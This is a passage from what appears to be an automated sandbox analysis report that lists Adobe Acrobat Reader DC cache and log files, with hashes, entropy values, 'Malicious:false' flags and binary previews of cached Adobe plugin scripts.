                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..rJE.#/....."#.D.....0.A...L...Im.@.........E.nW...IP..A..Eo...................A..Eo..................0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..I.E.#/....."#.D..8..0.A...L...Im.@.........E.nW...IP..A..Eo...................A..Eo.......C..........0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .L..E.#/....."#.DJa...0.A...L...Im.@.........E.nW...IP..A..Eo...................A..Eo..................0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js .r..E.#/....."#.D.y7..0.A...L...Im.@.........E.nW...IP..A..Eo...................A..Eo......QQ$.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):416
                                                                                                                                                                                                                                                        Entropy (8bit):5.590560280318395
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mKPYOFLvEWdENU9QOrNPiM3Y1TK6tG+KPYOFLvEWdENU9QIk0J7PiM3Y1TK6tg:bJRT93rFr0wJRT9Hk0dr0
                                                                                                                                                                                                                                                        MD5:C933E2D82B3A806C71D649671171F938
                                                                                                                                                                                                                                                        SHA1:90EE75FB10F949D819A1F7D822400CE994A2E230
                                                                                                                                                                                                                                                        SHA-256:6A48E42A159631DF094F1164E8FB80207B1EA7A4B7CF6AD88A7255E5E06A8700
                                                                                                                                                                                                                                                        SHA-512:E2FE8DE5E2F33DFB28575C24D46DCA54950FD173A5D9A74419BF0754BF062122BF67EE74111A8F9E20F2959BC0DFB75E63C62DC4021A8CAF2F1EE10B8A301E2A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ....E.#/....."#.D..y..0.A...M....m+lS..e.....<7.U.P8*.0K.A..Eo...................A..Eo........~.........0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ...E.#/....."#.D+.q..0.A...M....m+lS..e.....<7.U.P8*.0K.A..Eo...................A..Eo........r.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):416
                                                                                                                                                                                                                                                        Entropy (8bit):5.612197399405848
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mQt6EYOFLvEWdccAHQntdjBRCh/41TK6t6MQt6EYOFLvEWdccAHQKkMIjBRCh/4f:XRc9iPDi/EQhRc9ODi/E7
                                                                                                                                                                                                                                                        MD5:344BD46BCC1D479D66AAE6BB9F69E2C1
                                                                                                                                                                                                                                                        SHA1:B4F7BD20A7AAE931695CDE612E25B2C181C61E3E
                                                                                                                                                                                                                                                        SHA-256:101D48E588F30120458FA462B55E28CF3E585F3E55543C35441CCE120915EACA
                                                                                                                                                                                                                                                        SHA-512:E9F9D916BD988CE6B23152A3CD5C241F81251A4547CDFB1A696E6A7A9CF417E00E5B5D2AAACB76CE988DC6BE2A0837015D5CEB9A6D079834DECCFE7D661BD1D9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js ..c.E.#/....."#.D....0.APJm...0x.x..RD...BB!@5..<..]....A..Eo...................A..Eo......q..1........0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js .r..E.#/....."#.D\....0.APJm...0x.x..RD...BB!@5..<..]....A..Eo...................A..Eo......^..g........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):462
                                                                                                                                                                                                                                                        Entropy (8bit):5.577982444048799
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:bs6xRkiGz/6LlF4nsws6xRkiabLlF4nC:brxp6/6oswrxpso
                                                                                                                                                                                                                                                        MD5:348CF8B9E8E04166961F8DDAA708A964
                                                                                                                                                                                                                                                        SHA1:4272AAB7A02938788CF43A481CA5337B9A42252F
                                                                                                                                                                                                                                                        SHA-256:43DA04B1C7A268943030378292FC179785495B025384647EE31023CB5EBF1D0D
                                                                                                                                                                                                                                                        SHA-512:08F7DD3B1FC26ABB8C6650FE4762C24E9B5A85C65F6F43B6A3543B96F47462FEB6E725B870F818BC479E91D8A97B98B8564930D53038C8B3CDA96A898F13EFCE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js .7.WE.#/....."#.D.....0.A.P...#4..l....5...5..).w.. .h.~..A..Eo...................A..Eo................0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js ..-.E.#/....."#.D.c...0.A.P...#4..l....5...5..).w.. .h.~..A..Eo...................A..Eo......wy..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):430
                                                                                                                                                                                                                                                        Entropy (8bit):5.540411427576483
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mhYOFLvEWd/aFu57iY941TK6tjcf2hYOFLvEWd/aFu7k941TK6tWz/:WRbz9EJceRdk9EM
                                                                                                                                                                                                                                                        MD5:1295AB94DDB1A130AFD911234D4E89CA
                                                                                                                                                                                                                                                        SHA1:50074CDB73494C3C9B85DC44FB7DE009AFF1B0B8
                                                                                                                                                                                                                                                        SHA-256:EDF22C9DDC3A821B617C52B2EC8B2DCD18B8B3B93E620A309E795640C277B595
                                                                                                                                                                                                                                                        SHA-512:836FAD401936FDD860222D8C31C9A76B54F264A8E12C9C6081B5C4B95ED189EC00841FE13E3B5AD72A5F3304AFF60377A804D2ACF1AB9F500E98E7148EA3384A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js .A1.E.#/....."#.D.....0.A...a.f.m.i.o.p..3U5.....^...I.A..Eo...................A..Eo.......4.9........0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ....E.#/....."#.D....0.A...a.f.m.i.o.p..3U5.....^...I.A..Eo...................A..Eo......<E,.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):416
                                                                                                                                                                                                                                                        Entropy (8bit):5.56352629963541
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mR9YOFLvEWd7VIGXOdQG3nVvAGoBMqVd3G4K41TK6tg6+R9YOFLvEWd7VIGXOdQp:2DRuRPe5B9Vd2kgDRuROOpB9Vd2k
                                                                                                                                                                                                                                                        MD5:A5945F76BC3FC56CD102184E6A87875C
                                                                                                                                                                                                                                                        SHA1:EBCBCA93ACA1F1655103B10E9F6218FCBB2EABEE
                                                                                                                                                                                                                                                        SHA-256:857216CB0CBEA1C2BAADBC7200AED158D1F7E9231B3737FDE64D571FE1E2EFC3
                                                                                                                                                                                                                                                        SHA-512:120C830296911589140FE5393B66C7BC19C1FAE6EE0D65F84423D478BE2EA135F5D62EE0B3A4C0EF96873DC64201CAE382FE86B7209FBB3E5516A551A97C5CD4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ....E.#/....."#.D.....0.A..y.$..$.v5j...T...z.]..._S....A..Eo...................A..Eo..................0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ....E.#/....."#.D.u~..0.A..y.$..$.v5j...T...z.]..._S....A..Eo...................A..Eo.................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):832
                                                                                                                                                                                                                                                        Entropy (8bit):5.595627410266506
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:+RQqeIrnHURQ5DrnKsRQXcrneRQ7Jrn93:+9Dn00nKsYAneydn
                                                                                                                                                                                                                                                        MD5:3D79C89BEF3295FF031232DA43EC6EB4
                                                                                                                                                                                                                                                        SHA1:BDE1FE92F2EE923B649F2FB2989B8DFF9FAD8760
                                                                                                                                                                                                                                                        SHA-256:3A77224AA89BD0C63C8C3A166259D67835DA44901C094728BD612CD1F93C2E2F
                                                                                                                                                                                                                                                        SHA-512:DD26A8A9DE652D810B24A28738D3D3BC7BCFCD54CFA6768213225ACC53A924EE6F7DB00F29EE2DB0342DA234860873FB8ED09654D9CC8F0BFEED6639441DAFC3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js .)vZE.#/....."#.D|....0.A#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo...................A..Eo......[..U........0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js .=..E.#/....."#.D.....0.A#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo...................A..Eo.......p..........0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ..T.E.#/....."#.D.P!..0.A#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo...................A..Eo.........L........0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ....E.#/....."#.Dy....0.A#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo...................A..Eo........i.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                                                        Entropy (8bit):5.568573373867437
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:moXXYOFLvEWdENUAuVyC8n1TK6t/ltMoXXYOFLvEWdENUAu7R+ZMksyC8n1TK6tm:xhRT/7QZXzhRT5EM7Qo
                                                                                                                                                                                                                                                        MD5:7FB9A25CDEDC0F78A45266E3A6169A75
                                                                                                                                                                                                                                                        SHA1:0D496101CDE962601E606ECC5B83110E93C071ED
                                                                                                                                                                                                                                                        SHA-256:728A9755B5F81181E0F2000CDACCE4B5C8B4C8ABFDD49BC0ADBC47A011574809
                                                                                                                                                                                                                                                        SHA-512:A0E2A35CC2F2A0E452DAEE2781108E22118ABED39B9A28E64CDA7C0C4868A36C7CE4AD1842E02288F1600E8DE1E1E57A6DA4CBF3BE44DE0AFF3D7BFB8AF8D71A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js .}..E.#/....."#.D2.r..0.A8.../...;.\\o....1..........+..A..Eo...................A..Eo........^.........0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js ..n.E.#/....."#.D?om..0.A8.../...;.\\o....1..........+..A..Eo...................A..Eo.......Wq.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                        Entropy (8bit):5.638365697318789
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:nRrROk/VC2MmWXRrROk/VomCRrROk/VNmERrROk/V+cm8:nPJ/M2hGPJ/rCPJ/SEPJ/sR
                                                                                                                                                                                                                                                        MD5:41641895746864AEED9E70161C272A48
                                                                                                                                                                                                                                                        SHA1:3821D397D7BABFC564E02DFAF3FFFE913F13AEF2
                                                                                                                                                                                                                                                        SHA-256:18D877891792A62DE0A9FAB934A35AA31C32062FA9FC98C0CBE984FE490AB417
                                                                                                                                                                                                                                                        SHA-512:DACB4BDCA04A2E313A82E8C139B99CA1591385A8FC0CB38D9262E9DFF837740376293F8F992BD633F686CEFE8D784F2A01E9E9D9389A387760723B173BCCFC40
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ...WE.#/....."#.DC....0.A ./.ev......N~..6.b.....$.j;:C...A..Eo...................A..Eo......tv..........0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..k.E.#/....."#.DL.k..0.A ./.ev......N~..6.b.....$.j;:C...A..Eo...................A..Eo........Tu........0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ....E.#/....."#.D.....0.A ./.ev......N~..6.b.....$.j;:C...A..Eo...................A..Eo......Ab(.........0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js .'Y.E.#/....."#.D.~g..0.A ./.ev......N~..6.b.....$.j;:C...A..Eo...................A..Eo........`.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                                                        Entropy (8bit):5.561508736735259
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mZ/lXYOFLvEWdccAWuhs/GAdm9741TK6tWt2Z/lXYOFLvEWdccAWumIXWKSRBFGs:qxRcOGAdu7EE6xRcJXWvGAdu7EJ
                                                                                                                                                                                                                                                        MD5:4AFF780C1EA40FF889BB2324410D2870
                                                                                                                                                                                                                                                        SHA1:6C27A08BC904759BD6C313D2174605426581954D
                                                                                                                                                                                                                                                        SHA-256:5F22DE000EA62158833B0039FE9279F0E6D31BEC175C04E2EDD2521B9566B7C6
                                                                                                                                                                                                                                                        SHA-512:BE0EEB90542A6D8B823ACFB1E0449B86BFE074E4912F4F35F607ED93FBF3D9EC698B59B609FFB214C898A504D50FCC308C02F1E39ADE9D6056EF627280403DB5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ....E.#/....."#.Dx....0.A...U...I.>P...X...x..0U.~;m.x.k.A..Eo...................A..Eo.......9.........0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js .b..E.#/....."#.D./w..0.A...U...I.>P...X...x..0U.~;m.x.k.A..Eo...................A..Eo.......r..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):408
                                                                                                                                                                                                                                                        Entropy (8bit):5.557735052448219
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mMOYOFLvEWdwAPVuC7SJn1TK6tQMOYOFLvEWdwAPVuLSJn1TK6tg/l:2R1VcLaR1pL
                                                                                                                                                                                                                                                        MD5:F481D379BE3CE3649A56EF890CB103CC
                                                                                                                                                                                                                                                        SHA1:E565CBAA75DF9934CE10914D04F2A5A5F396CD72
                                                                                                                                                                                                                                                        SHA-256:03E211BB6BD20936AE139105782D31A98E64E154A787349EFB45672C52E6E56C
                                                                                                                                                                                                                                                        SHA-512:2B605566D4149E00CFCDA6502D607D83C7E3839C01DFDB60339928EF987328629CA9C910639F4F14D33B0E1A8C9CB01388BBEEE983C96042CDC49137CEC30B10
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ....E.#/....."#.Dr.s..0.A.....k....F..D..O.n;[.1m.....=..A..Eo...................A..Eo..................0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..l.E.#/....."#.D.Pm..0.A.....k....F..D..O.n;[.1m.....=..A..Eo...................A..Eo......v.I.........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):424
                                                                                                                                                                                                                                                        Entropy (8bit):5.68614323599123
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:m3PXYOFLvEWdBJvYQCzhcsBXIh1TK6tbl/23PXYOFLvEWdBJvYQaJzhcsBXIh1TF:mxRBJQxDB01tWxRBJQfJDB0P
                                                                                                                                                                                                                                                        MD5:EA49AF970F9F7C37ECE424903ECD31D1
                                                                                                                                                                                                                                                        SHA1:B30FADB414AF176AA5B59A03E78B87673A1BC1C6
                                                                                                                                                                                                                                                        SHA-256:57BBD203666AFC2B7C75ED3ADFC6CAF0728A1397DFF870CA2E81DB5F1E91CB9A
                                                                                                                                                                                                                                                        SHA-512:AB5C0AE344F9BDC5CEF53C18F864378E2A7298B2ECF3844550CBC1E9B7398B6E80360C01A447229F42CBFA08BF41914F0A1BACCF5C9477C6AA646A9B37765C78
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js ....E.#/....."#.D....0.A...k..`..N3.... ..d..$[.....{.A..Eo...................A..Eo.......1..........0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js .w6.E.#/....."#.D..~..0.A...k..`..N3.... ..d..$[.....{.A..Eo...................A..Eo......?..)........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                        Entropy (8bit):5.5940524283171635
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:3RrROk/sRE2ccRrROk/s8lc2RrROk/sJ2cI/RrROk/syYkc:3PJ/v/cPJ/M2PJ/GoPJ/LI
                                                                                                                                                                                                                                                        MD5:59CA02C939EE3630CF5597D5E07046CB
                                                                                                                                                                                                                                                        SHA1:17439216FBA024C9C1552455B885C92BBA64384D
                                                                                                                                                                                                                                                        SHA-256:00DF701915D3C01F3F4704EB1C0E170F480865D7F899EC157924147B151C7B86
                                                                                                                                                                                                                                                        SHA-512:60EF763F295FC6B5B01AB4225732A8DB85B436DEEAC9F1A413425BF8D40964F0C40CB49613E6C63467A2C4E417ED5B1CE6873DC33B03A5B668221F697CCC95CE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js .>.WE.#/....."#.DQj...0.A.....9Q].8O.z....=..:.N.{....N{.A..Eo...................A..Eo........Sn........0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js .d~.E.#/....."#.D..k..0.A.....9Q].8O.z....=..:.N.{....N{.A..Eo...................A..Eo......n..+........0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js .=..E.#/....."#.D. ...0.A.....9Q].8O.z....=..:.N.{....N{.A..Eo...................A..Eo.......:.i........0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..Y.E.#/....."#.D,.g..0.A.....9Q].8O.z....=..:.N.{....N{.A..Eo...................A..Eo.......)..........
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2064
                                                                                                                                                                                                                                                        Entropy (8bit):5.338270495347256
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:h1zZ4+dsp6skxylHW5q1p1VH4cHwEHIYU8EA9uuqHAbzbxtHvD7M9yMtpyendLFO:hX4p6srlHMOp1VH4cHwEHIr8EA9uuqHK
                                                                                                                                                                                                                                                        MD5:23A1A85744D5735C1538C2B3AA76EDE4
                                                                                                                                                                                                                                                        SHA1:1EF91A0B86B687AA387AA38358A4A000144F944B
                                                                                                                                                                                                                                                        SHA-256:B4C30BCEDEAC892781B911051B7093E72857C6D7751B3AD08BDF8D8997761C46
                                                                                                                                                                                                                                                        SHA-512:9A50E0F1CA37A9511C875F0996AD677A8A014BEB95E05C2B6489093FEE75C7CECD6007536A1DE5C72DA9543768B05491D950349DEA75D1DC504F11F8878C3A1D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: ....h...oy retne....'........'............;.y~A..z.B_./...........*...z.B_./..............oB*.8.B_./............#...(...A_./.............k7A..z.B_./.............D.4..z.B_./..........[.i..%..z.B_./.........<...W..J.8.B_./.........,+..._.#.z.B_./..........J..j....z.B_./...........6<|....8.B_./.........A?.2:...z.B_./..........+.{..'.z.B_./.........*)....J:.z.B_./...........2q.....z.B_./...........P....V.z.B_./.........+.U.!..V.z.B_./............P[. q.z.B_./.........!...0.o.z.B_./..........u\]..q.z.B_./.................z.B_./...........*.....z.B_./..........o..k...z.B_./.........^.~..z..z.B_./.............o..z.B_./.........Gy.'.h..z.B_./.........F..=z;..z.B_./...........3....z.B_./..........v...q...8.B_./..........C..M.....A_./...........a.....8.B_./..........~.,.4>..z.B_./..........&.S.....z.B_./..........@..x..z.B_./.........=....m...z.B_./..........;/....z.B_./..............q..z.B_./............MV3...z.B_./.........:..N.A...z.B_./............B_./.0......poy retne
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):292
                                                                                                                                                                                                                                                        Entropy (8bit):5.178403825159476
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:mwGTmyq2PWXp+N2nKuAl9OmbnIFUtpDG6cu51ZmwPDG6cuvRkwOWXp+N2nKuAl91:aT7vaHAahFUtpK6c21/PK6cY5fHAaSJ
                                                                                                                                                                                                                                                        MD5:792A876184A16A16A277E9BD0C0F7554
                                                                                                                                                                                                                                                        SHA1:55152B43962570E515248577537E6126B582E842
                                                                                                                                                                                                                                                        SHA-256:7D804C31CA09591948830058C961735346FA1F0C2B4141C1ABAF5B8CB83EA12C
                                                                                                                                                                                                                                                        SHA-512:39F90CD2C7A5ABC9AAB88EF06DE4A8BD89A66A2250C239A381D91F95629CD41AE683B2038466F1665FE82AE9179EFE8A671EB37D64AA642672B10F15AA4BB957
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: 2021/06/11-10:39:20.154 15a0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2021/06/11-10:39:20.189 15a0 Recovering log #3.2021/06/11-10:39:20.189 15a0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                        Entropy (8bit):0.010450311063861047
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:TGEiaGEiCsMi9sMiDdsmWiDdsmWiDOsmWhCDTsmWhCDoDsmWhCDoDsmWhCDoDsmf:tFVFVAnfnovnovnovnovnovnovno
                                                                                                                                                                                                                                                        MD5:C5320DB321A0EC2EA0AEE50ACE073382
                                                                                                                                                                                                                                                        SHA1:2E3A5F1F8C5FE89B022C94BD3574BECA1445D34D
                                                                                                                                                                                                                                                        SHA-256:10CB1245EF4F539D1B2E962879068A09BDCFD07FCEDB103F78A17338C73A6B22
                                                                                                                                                                                                                                                        SHA-512:1FC54F5F46BFBF53AD1955165B9D246B1F351CA134578A028B118A3F887B8F72F710776A7FDF45731CE6DA20ED37FE07AE67FFD3B3236B845FC1140178C8D153
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: VLnk.....?.......Tq.>..j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-210611173915Z-215.bmp
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                        File Type:PC bitmap, Windows 3.x format, 114 x -152 x 32
